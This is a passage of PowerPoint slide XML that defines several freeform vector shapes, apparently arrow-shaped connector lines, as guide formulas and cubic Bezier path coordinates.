                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="586"/>
                      <a:pt x="76" y="586"/>
                      <a:pt x="76" y="586"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="662"/>
                      <a:pt x="137" y="724"/>
                      <a:pt x="213" y="724"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="672" y="727"/>
                      <a:pt x="672" y="727"/>
                      <a:pt x="672" y="727"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="689" y="727"/>
                      <a:pt x="703" y="742"/>
                      <a:pt x="703" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="703" y="1029"/>
                      <a:pt x="703" y="1029"/>
                      <a:pt x="703" y="1029"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="810" y="1029"/>
                      <a:pt x="810" y="1029"/>
                      <a:pt x="810" y="1029"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="810" y="759"/>
                      <a:pt x="810" y="759"/>
                      <a:pt x="810" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="810" y="683"/>
                      <a:pt x="748" y="621"/>
                      <a:pt x="673" y="62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" name="Freeform 263"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4462489" y="4075118"/>
                <a:ext cx="1174757" cy="2771778"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 483 w 620"/>
                  <a:gd name="T1" fmla="*/ 741 h 1463"/>
                  <a:gd name="T2" fmla="*/ 214 w 620"/>
                  <a:gd name="T3" fmla="*/ 738 h 1463"/>
                  <a:gd name="T4" fmla="*/ 183 w 620"/>
                  <a:gd name="T5" fmla="*/ 706 h 1463"/>
                  <a:gd name="T6" fmla="*/ 183 w 620"/>
                  <a:gd name="T7" fmla="*/ 150 h 1463"/>
                  <a:gd name="T8" fmla="*/ 222 w 620"/>
                  <a:gd name="T9" fmla="*/ 150 h 1463"/>
                  <a:gd name="T10" fmla="*/ 242 w 620"/>
                  <a:gd name="T11" fmla="*/ 103 h 1463"/>
                  <a:gd name="T12" fmla="*/ 149 w 620"/>
                  <a:gd name="T13" fmla="*/ 10 h 1463"/>
                  <a:gd name="T14" fmla="*/ 110 w 620"/>
                  <a:gd name="T15" fmla="*/ 10 h 1463"/>
                  <a:gd name="T16" fmla="*/ 18 w 620"/>
                  <a:gd name="T17" fmla="*/ 103 h 1463"/>
                  <a:gd name="T18" fmla="*/ 37 w 620"/>
                  <a:gd name="T19" fmla="*/ 150 h 1463"/>
                  <a:gd name="T20" fmla="*/ 76 w 620"/>
                  <a:gd name="T21" fmla="*/ 150 h 1463"/>
                  <a:gd name="T22" fmla="*/ 76 w 620"/>
                  <a:gd name="T23" fmla="*/ 706 h 1463"/>
                  <a:gd name="T24" fmla="*/ 213 w 620"/>
                  <a:gd name="T25" fmla="*/ 845 h 1463"/>
                  <a:gd name="T26" fmla="*/ 482 w 620"/>
                  <a:gd name="T27" fmla="*/ 847 h 1463"/>
                  <a:gd name="T28" fmla="*/ 514 w 620"/>
                  <a:gd name="T29" fmla="*/ 879 h 1463"/>
                  <a:gd name="T30" fmla="*/ 514 w 620"/>
                  <a:gd name="T31" fmla="*/ 1463 h 1463"/>
                  <a:gd name="T32" fmla="*/ 620 w 620"/>
                  <a:gd name="T33" fmla="*/ 1463 h 1463"/>
                  <a:gd name="T34" fmla="*/ 620 w 620"/>
                  <a:gd name="T35" fmla="*/ 879 h 1463"/>
                  <a:gd name="T36" fmla="*/ 483 w 620"/>
                  <a:gd name="T37" fmla="*/ 741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20" h="1463">
                    <a:moveTo>
                      <a:pt x="483" y="741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="738"/>
                      <a:pt x="214" y="738"/>
                      <a:pt x="214" y="738"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="738"/>
                      <a:pt x="183" y="724"/>
                      <a:pt x="183" y="706"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="150"/>
                      <a:pt x="183" y="150"/>
                      <a:pt x="183" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="150"/>
                      <a:pt x="222" y="150"/>
                      <a:pt x="222" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="247" y="150"/>
                      <a:pt x="259" y="120"/>
                      <a:pt x="242" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="10"/>
                      <a:pt x="149" y="10"/>
                      <a:pt x="149" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="0"/>
                      <a:pt x="121" y="0"/>
                      <a:pt x="110" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="103"/>
                      <a:pt x="18" y="103"/>
                      <a:pt x="18" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="120"/>
                      <a:pt x="13" y="150"/>
                      <a:pt x="37" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="706"/>
                      <a:pt x="76" y="706"/>
                      <a:pt x="76" y="706"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="782"/>
                      <a:pt x="138" y="844"/>
                      <a:pt x="213" y="845"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="482" y="847"/>
                      <a:pt x="482" y="847"/>
                      <a:pt x="482" y="847"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="500" y="847"/>
                      <a:pt x="514" y="862"/>
                      <a:pt x="514" y="879"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="514" y="1463"/>
                      <a:pt x="514" y="1463"/>
                      <a:pt x="514" y="1463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="620" y="1463"/>
                      <a:pt x="620" y="1463"/>
                      <a:pt x="620" y="1463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="620" y="879"/>
                      <a:pt x="620" y="879"/>
                      <a:pt x="620" y="879"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="620" y="804"/>
                      <a:pt x="559" y="741"/>
                      <a:pt x="483" y="74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" name="Freeform 264"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5114955" y="3441704"/>
                <a:ext cx="781054" cy="3405191"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 275 w 412"/>
                  <a:gd name="T1" fmla="*/ 752 h 1797"/>
                  <a:gd name="T2" fmla="*/ 214 w 412"/>
                  <a:gd name="T3" fmla="*/ 752 h 1797"/>
                  <a:gd name="T4" fmla="*/ 183 w 412"/>
                  <a:gd name="T5" fmla="*/ 720 h 1797"/>
                  <a:gd name="T6" fmla="*/ 183 w 412"/>
                  <a:gd name="T7" fmla="*/ 150 h 1797"/>
                  <a:gd name="T8" fmla="*/ 222 w 412"/>
                  <a:gd name="T9" fmla="*/ 150 h 1797"/>
                  <a:gd name="T10" fmla="*/ 241 w 412"/>
                  <a:gd name="T11" fmla="*/ 104 h 1797"/>
                  <a:gd name="T12" fmla="*/ 149 w 412"/>
                  <a:gd name="T13" fmla="*/ 11 h 1797"/>
                  <a:gd name="T14" fmla="*/ 110 w 412"/>
                  <a:gd name="T15" fmla="*/ 11 h 1797"/>
                  <a:gd name="T16" fmla="*/ 17 w 412"/>
                  <a:gd name="T17" fmla="*/ 104 h 1797"/>
                  <a:gd name="T18" fmla="*/ 37 w 412"/>
                  <a:gd name="T19" fmla="*/ 150 h 1797"/>
                  <a:gd name="T20" fmla="*/ 76 w 412"/>
                  <a:gd name="T21" fmla="*/ 150 h 1797"/>
                  <a:gd name="T22" fmla="*/ 76 w 412"/>
                  <a:gd name="T23" fmla="*/ 720 h 1797"/>
                  <a:gd name="T24" fmla="*/ 213 w 412"/>
                  <a:gd name="T25" fmla="*/ 858 h 1797"/>
                  <a:gd name="T26" fmla="*/ 274 w 412"/>
                  <a:gd name="T27" fmla="*/ 859 h 1797"/>
                  <a:gd name="T28" fmla="*/ 306 w 412"/>
                  <a:gd name="T29" fmla="*/ 891 h 1797"/>
                  <a:gd name="T30" fmla="*/ 306 w 412"/>
                  <a:gd name="T31" fmla="*/ 1797 h 1797"/>
                  <a:gd name="T32" fmla="*/ 412 w 412"/>
                  <a:gd name="T33" fmla="*/ 1797 h 1797"/>
                  <a:gd name="T34" fmla="*/ 412 w 412"/>
                  <a:gd name="T35" fmla="*/ 891 h 1797"/>
                  <a:gd name="T36" fmla="*/ 275 w 412"/>
                  <a:gd name="T37" fmla="*/ 752 h 17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2" h="1797">
                    <a:moveTo>
                      <a:pt x="275" y="752"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="752"/>
                      <a:pt x="214" y="752"/>
                      <a:pt x="214" y="752"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="752"/>
                      <a:pt x="183" y="737"/>
                      <a:pt x="183" y="720"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="150"/>
                      <a:pt x="183" y="150"/>
                      <a:pt x="183" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="150"/>
                      <a:pt x="222" y="150"/>
                      <a:pt x="222" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="246" y="150"/>
                      <a:pt x="259" y="121"/>
                      <a:pt x="241" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="11"/>
                      <a:pt x="149" y="11"/>
                      <a:pt x="149" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="0"/>
                      <a:pt x="121" y="0"/>
                      <a:pt x="110" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="104"/>
                      <a:pt x="17" y="104"/>
                      <a:pt x="17" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="121"/>
                      <a:pt x="12" y="150"/>
                      <a:pt x="37" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="720"/>
                      <a:pt x="76" y="720"/>
                      <a:pt x="76" y="720"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="796"/>
                      <a:pt x="138" y="858"/>
                      <a:pt x="213" y="858"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="274" y="859"/>
                      <a:pt x="274" y="859"/>
                      <a:pt x="274" y="859"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="292" y="859"/>
                      <a:pt x="306" y="873"/>
                      <a:pt x="306" y="891"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="306" y="1797"/>
                      <a:pt x="306" y="1797"/>
                      <a:pt x="306" y="1797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="412" y="1797"/>
                      <a:pt x="412" y="1797"/>
                      <a:pt x="412" y="1797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="412" y="891"/>
                      <a:pt x="412" y="891"/>
                      <a:pt x="412" y="891"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="412" y="815"/>
                      <a:pt x="351" y="753"/>
                      <a:pt x="275" y="752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" name="Freeform 265"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6826289" y="5156206"/>
                <a:ext cx="1238257" cy="1701802"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 654 w 654"/>
                  <a:gd name="T1" fmla="*/ 21 h 898"/>
                  <a:gd name="T2" fmla="*/ 634 w 654"/>
                  <a:gd name="T3" fmla="*/ 0 h 898"/>
                  <a:gd name="T4" fmla="*/ 614 w 654"/>
                  <a:gd name="T5" fmla="*/ 21 h 898"/>
                  <a:gd name="T6" fmla="*/ 614 w 654"/>
                  <a:gd name="T7" fmla="*/ 38 h 898"/>
                  <a:gd name="T8" fmla="*/ 628 w 654"/>
                  <a:gd name="T9" fmla="*/ 24 h 898"/>
                  <a:gd name="T10" fmla="*/ 628 w 654"/>
                  <a:gd name="T11" fmla="*/ 449 h 898"/>
                  <a:gd name="T12" fmla="*/ 549 w 654"/>
                  <a:gd name="T13" fmla="*/ 528 h 898"/>
                  <a:gd name="T14" fmla="*/ 91 w 654"/>
                  <a:gd name="T15" fmla="*/ 531 h 898"/>
                  <a:gd name="T16" fmla="*/ 0 w 654"/>
                  <a:gd name="T17" fmla="*/ 622 h 898"/>
                  <a:gd name="T18" fmla="*/ 0 w 654"/>
                  <a:gd name="T19" fmla="*/ 892 h 898"/>
                  <a:gd name="T20" fmla="*/ 6 w 654"/>
                  <a:gd name="T21" fmla="*/ 898 h 898"/>
                  <a:gd name="T22" fmla="*/ 12 w 654"/>
                  <a:gd name="T23" fmla="*/ 892 h 898"/>
                  <a:gd name="T24" fmla="*/ 12 w 654"/>
                  <a:gd name="T25" fmla="*/ 622 h 898"/>
                  <a:gd name="T26" fmla="*/ 91 w 654"/>
                  <a:gd name="T27" fmla="*/ 543 h 898"/>
                  <a:gd name="T28" fmla="*/ 550 w 654"/>
                  <a:gd name="T29" fmla="*/ 540 h 898"/>
                  <a:gd name="T30" fmla="*/ 640 w 654"/>
                  <a:gd name="T31" fmla="*/ 449 h 898"/>
                  <a:gd name="T32" fmla="*/ 640 w 654"/>
                  <a:gd name="T33" fmla="*/ 24 h 898"/>
                  <a:gd name="T34" fmla="*/ 654 w 654"/>
                  <a:gd name="T35" fmla="*/ 38 h 898"/>
                  <a:gd name="T36" fmla="*/ 654 w 654"/>
                  <a:gd name="T37" fmla="*/ 21 h 8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54" h="898">
                    <a:moveTo>
                      <a:pt x="654" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="634" y="0"/>
                      <a:pt x="634" y="0"/>
                      <a:pt x="634" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="614" y="21"/>
                      <a:pt x="614" y="21"/>
                      <a:pt x="614" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="614" y="38"/>
                      <a:pt x="614" y="38"/>
                      <a:pt x="614" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="24"/>
                      <a:pt x="628" y="24"/>
                      <a:pt x="628" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="449"/>
                      <a:pt x="628" y="449"/>
                      <a:pt x="628" y="449"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="492"/>
                      <a:pt x="593" y="528"/>
                      <a:pt x="549" y="528"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="531"/>
                      <a:pt x="91" y="531"/>
                      <a:pt x="91" y="531"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="531"/>
                      <a:pt x="0" y="572"/>
                      <a:pt x="0" y="622"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="892"/>
                      <a:pt x="0" y="892"/>
                      <a:pt x="0" y="892"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="895"/>
                      <a:pt x="3" y="898"/>
                      <a:pt x="6" y="898"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="898"/>
                      <a:pt x="12" y="895"/>
                      <a:pt x="12" y="892"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="622"/>
                      <a:pt x="12" y="622"/>
                      <a:pt x="12" y="622"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="579"/>
                      <a:pt x="47" y="543"/>
                      <a:pt x="91" y="543"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="550" y="540"/>
                      <a:pt x="550" y="540"/>
                      <a:pt x="550" y="540"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="599" y="539"/>
                      <a:pt x="640" y="499"/>
                      <a:pt x="640" y="449"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="640" y="24"/>
                      <a:pt x="640" y="24"/>
                      <a:pt x="640" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="38"/>
                      <a:pt x="654" y="38"/>
                      <a:pt x="654" y="38"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="654" y="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" name="Freeform 266"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5321331" y="3703642"/>
                <a:ext cx="485778" cy="3154366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 256"/>
                  <a:gd name="T1" fmla="*/ 662 h 1665"/>
                  <a:gd name="T2" fmla="*/ 105 w 256"/>
                  <a:gd name="T3" fmla="*/ 661 h 1665"/>
                  <a:gd name="T4" fmla="*/ 26 w 256"/>
                  <a:gd name="T5" fmla="*/ 582 h 1665"/>
                  <a:gd name="T6" fmla="*/ 26 w 256"/>
                  <a:gd name="T7" fmla="*/ 23 h 1665"/>
                  <a:gd name="T8" fmla="*/ 41 w 256"/>
                  <a:gd name="T9" fmla="*/ 38 h 1665"/>
                  <a:gd name="T10" fmla="*/ 41 w 256"/>
                  <a:gd name="T11" fmla="*/ 21 h 1665"/>
                  <a:gd name="T12" fmla="*/ 20 w 256"/>
                  <a:gd name="T13" fmla="*/ 0 h 1665"/>
                  <a:gd name="T14" fmla="*/ 0 w 256"/>
                  <a:gd name="T15" fmla="*/ 21 h 1665"/>
                  <a:gd name="T16" fmla="*/ 0 w 256"/>
                  <a:gd name="T17" fmla="*/ 38 h 1665"/>
                  <a:gd name="T18" fmla="*/ 14 w 256"/>
                  <a:gd name="T19" fmla="*/ 23 h 1665"/>
                  <a:gd name="T20" fmla="*/ 14 w 256"/>
                  <a:gd name="T21" fmla="*/ 582 h 1665"/>
                  <a:gd name="T22" fmla="*/ 105 w 256"/>
                  <a:gd name="T23" fmla="*/ 673 h 1665"/>
                  <a:gd name="T24" fmla="*/ 166 w 256"/>
                  <a:gd name="T25" fmla="*/ 674 h 1665"/>
                  <a:gd name="T26" fmla="*/ 244 w 256"/>
                  <a:gd name="T27" fmla="*/ 753 h 1665"/>
                  <a:gd name="T28" fmla="*/ 244 w 256"/>
                  <a:gd name="T29" fmla="*/ 1659 h 1665"/>
                  <a:gd name="T30" fmla="*/ 250 w 256"/>
                  <a:gd name="T31" fmla="*/ 1665 h 1665"/>
                  <a:gd name="T32" fmla="*/ 256 w 256"/>
                  <a:gd name="T33" fmla="*/ 1659 h 1665"/>
                  <a:gd name="T34" fmla="*/ 256 w 256"/>
                  <a:gd name="T35" fmla="*/ 753 h 1665"/>
                  <a:gd name="T36" fmla="*/ 166 w 256"/>
                  <a:gd name="T37" fmla="*/ 662 h 1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6" h="1665">
                    <a:moveTo>
                      <a:pt x="166" y="662"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="661"/>
                      <a:pt x="105" y="661"/>
                      <a:pt x="105" y="661"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="661"/>
                      <a:pt x="26" y="625"/>
                      <a:pt x="26" y="582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582"/>
                      <a:pt x="14" y="582"/>
                      <a:pt x="14" y="582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="632"/>
                      <a:pt x="55" y="673"/>
                      <a:pt x="105" y="673"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="674"/>
                      <a:pt x="166" y="674"/>
                      <a:pt x="166" y="674"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="674"/>
                      <a:pt x="244" y="710"/>
                      <a:pt x="244" y="753"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244" y="1659"/>
                      <a:pt x="244" y="1659"/>
                      <a:pt x="244" y="1659"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244" y="1662"/>
                      <a:pt x="247" y="1665"/>
                      <a:pt x="250" y="1665"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="253" y="1665"/>
                      <a:pt x="256" y="1662"/>
                      <a:pt x="256" y="1659"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="753"/>
                      <a:pt x="256" y="753"/>
                      <a:pt x="256" y="753"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="703"/>
                      <a:pt x="216" y="662"/>
                      <a:pt x="166" y="66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" name="Freeform 267"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4668865" y="4333880"/>
                <a:ext cx="879480" cy="2524128"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 374 w 464"/>
                  <a:gd name="T1" fmla="*/ 651 h 1332"/>
                  <a:gd name="T2" fmla="*/ 105 w 464"/>
                  <a:gd name="T3" fmla="*/ 648 h 1332"/>
                  <a:gd name="T4" fmla="*/ 27 w 464"/>
                  <a:gd name="T5" fmla="*/ 569 h 1332"/>
                  <a:gd name="T6" fmla="*/ 27 w 464"/>
                  <a:gd name="T7" fmla="*/ 24 h 1332"/>
                  <a:gd name="T8" fmla="*/ 41 w 464"/>
                  <a:gd name="T9" fmla="*/ 38 h 1332"/>
                  <a:gd name="T10" fmla="*/ 41 w 464"/>
                  <a:gd name="T11" fmla="*/ 21 h 1332"/>
                  <a:gd name="T12" fmla="*/ 21 w 464"/>
                  <a:gd name="T13" fmla="*/ 0 h 1332"/>
                  <a:gd name="T14" fmla="*/ 0 w 464"/>
                  <a:gd name="T15" fmla="*/ 21 h 1332"/>
                  <a:gd name="T16" fmla="*/ 0 w 464"/>
                  <a:gd name="T17" fmla="*/ 38 h 1332"/>
                  <a:gd name="T18" fmla="*/ 15 w 464"/>
                  <a:gd name="T19" fmla="*/ 24 h 1332"/>
                  <a:gd name="T20" fmla="*/ 15 w 464"/>
                  <a:gd name="T21" fmla="*/ 569 h 1332"/>
                  <a:gd name="T22" fmla="*/ 105 w 464"/>
                  <a:gd name="T23" fmla="*/ 660 h 1332"/>
                  <a:gd name="T24" fmla="*/ 374 w 464"/>
                  <a:gd name="T25" fmla="*/ 663 h 1332"/>
                  <a:gd name="T26" fmla="*/ 452 w 464"/>
                  <a:gd name="T27" fmla="*/ 742 h 1332"/>
                  <a:gd name="T28" fmla="*/ 452 w 464"/>
                  <a:gd name="T29" fmla="*/ 1326 h 1332"/>
                  <a:gd name="T30" fmla="*/ 458 w 464"/>
                  <a:gd name="T31" fmla="*/ 1332 h 1332"/>
                  <a:gd name="T32" fmla="*/ 464 w 464"/>
                  <a:gd name="T33" fmla="*/ 1326 h 1332"/>
                  <a:gd name="T34" fmla="*/ 464 w 464"/>
                  <a:gd name="T35" fmla="*/ 742 h 1332"/>
                  <a:gd name="T36" fmla="*/ 374 w 464"/>
                  <a:gd name="T37" fmla="*/ 651 h 1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64" h="1332">
                    <a:moveTo>
                      <a:pt x="374" y="651"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="648"/>
                      <a:pt x="105" y="648"/>
                      <a:pt x="105" y="648"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="648"/>
                      <a:pt x="27" y="612"/>
                      <a:pt x="27" y="569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569"/>
                      <a:pt x="15" y="569"/>
                      <a:pt x="15" y="569"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="619"/>
                      <a:pt x="55" y="660"/>
                      <a:pt x="105" y="660"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="374" y="663"/>
                      <a:pt x="374" y="663"/>
                      <a:pt x="374" y="663"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="663"/>
                      <a:pt x="452" y="699"/>
                      <a:pt x="452" y="742"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="452" y="1326"/>
                      <a:pt x="452" y="1326"/>
                      <a:pt x="452" y="1326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="452" y="1329"/>
                      <a:pt x="455" y="1332"/>
                      <a:pt x="458" y="1332"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="461" y="1332"/>
                      <a:pt x="464" y="1329"/>
                      <a:pt x="464" y="1326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="464" y="742"/>
                      <a:pt x="464" y="742"/>
                      <a:pt x="464" y="742"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="464" y="692"/>
                      <a:pt x="423" y="651"/>
                      <a:pt x="374" y="6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" name="Freeform 268"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4051324" y="5156206"/>
                <a:ext cx="1239844" cy="1701802"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 563 w 654"/>
                  <a:gd name="T1" fmla="*/ 531 h 898"/>
                  <a:gd name="T2" fmla="*/ 104 w 654"/>
                  <a:gd name="T3" fmla="*/ 528 h 898"/>
                  <a:gd name="T4" fmla="*/ 26 w 654"/>
                  <a:gd name="T5" fmla="*/ 449 h 898"/>
                  <a:gd name="T6" fmla="*/ 26 w 654"/>
                  <a:gd name="T7" fmla="*/ 24 h 898"/>
                  <a:gd name="T8" fmla="*/ 40 w 654"/>
                  <a:gd name="T9" fmla="*/ 38 h 898"/>
                  <a:gd name="T10" fmla="*/ 40 w 654"/>
                  <a:gd name="T11" fmla="*/ 21 h 898"/>
                  <a:gd name="T12" fmla="*/ 20 w 654"/>
                  <a:gd name="T13" fmla="*/ 0 h 898"/>
                  <a:gd name="T14" fmla="*/ 0 w 654"/>
                  <a:gd name="T15" fmla="*/ 21 h 898"/>
                  <a:gd name="T16" fmla="*/ 0 w 654"/>
                  <a:gd name="T17" fmla="*/ 38 h 898"/>
                  <a:gd name="T18" fmla="*/ 14 w 654"/>
                  <a:gd name="T19" fmla="*/ 24 h 898"/>
                  <a:gd name="T20" fmla="*/ 14 w 654"/>
                  <a:gd name="T21" fmla="*/ 449 h 898"/>
                  <a:gd name="T22" fmla="*/ 104 w 654"/>
                  <a:gd name="T23" fmla="*/ 540 h 898"/>
                  <a:gd name="T24" fmla="*/ 563 w 654"/>
                  <a:gd name="T25" fmla="*/ 543 h 898"/>
                  <a:gd name="T26" fmla="*/ 642 w 654"/>
                  <a:gd name="T27" fmla="*/ 622 h 898"/>
                  <a:gd name="T28" fmla="*/ 642 w 654"/>
                  <a:gd name="T29" fmla="*/ 892 h 898"/>
                  <a:gd name="T30" fmla="*/ 648 w 654"/>
                  <a:gd name="T31" fmla="*/ 898 h 898"/>
                  <a:gd name="T32" fmla="*/ 654 w 654"/>
                  <a:gd name="T33" fmla="*/ 892 h 898"/>
                  <a:gd name="T34" fmla="*/ 654 w 654"/>
                  <a:gd name="T35" fmla="*/ 622 h 898"/>
                  <a:gd name="T36" fmla="*/ 563 w 654"/>
                  <a:gd name="T37" fmla="*/ 531 h 8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54" h="898">
                    <a:moveTo>
                      <a:pt x="563" y="531"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="528"/>
                      <a:pt x="104" y="528"/>
                      <a:pt x="104" y="528"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="528"/>
                      <a:pt x="26" y="492"/>
                      <a:pt x="26" y="449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449"/>
                      <a:pt x="14" y="449"/>
                      <a:pt x="14" y="449"/>
